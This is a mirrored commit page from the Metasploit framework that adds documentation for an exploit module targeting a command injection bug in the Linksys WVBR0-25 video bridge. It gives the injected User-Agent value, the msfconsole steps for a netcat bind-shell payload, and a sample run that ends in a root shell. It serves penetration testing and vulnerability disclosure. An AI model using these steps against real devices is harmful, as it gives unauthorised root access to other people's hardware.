infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Adding doc file for module linksys_wvbr0_user_agent_exec_noauth

MS-2855/keylogger-mettle-extension
headlesszeke 2018-01-02 14:54:18 -06:00
parent 3dfb836768
commit 3b0f0aa358
1 changed files with 49 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

49
documentation/modules/exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth.md Normal file
View File

@ -0,0 +1,49 @@
## Vulnerable Application
This module exploits a command injection vulnerability in the [Linksys WVBR0-25](https://www.att.com/help/manuals/directv/dvrs.html) wireless video bridge. A description of the exploited vulnerability is available in the Vulnerability Details section of [this advisory](http://www.zerodayinitiative.com/advisories/ZDI-17-973/).
The latest confirmed vulnerable firmware version is 1.0.39. It may be possible to downgrade newer versions to a vulnerable version, but since firmware images are not available for download, this cannot be verified.
There is no complete list of vulnerable firmware versions, however the check method can reliably detect whether a device is vulnerable. The check method browses to the root of the device's webserver with a User-Agent set to `"; printf "[random string]`. If the response contains an md5 hash of the random string, the device is vulnerable to command injection.
Manual exploitation would equate to browsing to the URI `http://<ip>/` with the User-Agent header set to `"; command;`.
Version 1.0.39 was confirmed vulnerable, and firmware 1.0.41 was released to fix the exploit.
## Verification Steps
1. Make sure the device is running.
2. Start msfconsole.
3. Do: ```use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth```
4. Do: ```set payload cmd/unix/bind_netcat```
5. Do: ```set RHOST <ip>```
6. Do: ```exploit```
7. You should get a shell.
## Options
**PAYLOAD**
The `generic` and `netcat` payload types are valid.
## Scenarios
### Firmware 1.0.39
The following is an example run getting a shell:
```
msf > use exploit/linux/http/linksys_wvbr0_user_agent_exec_noauth
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > set RHOST 10.0.0.104
RHOST => 10.0.0.104
msf exploit(linksys_wvbr0_user_agent_exec_noauth) > exploit
[*] 10.0.0.104:80 - Trying to access the device ...
[*] Started bind handler
[*] 10.0.0.104:80 - Exploiting...
[*] Command shell session 1 opened (10.0.0.109:40541 -> 10.0.0.104:4444) at 2017-12-21 17:09:54 -0600
id
uid=0(root) gid=0(root)
```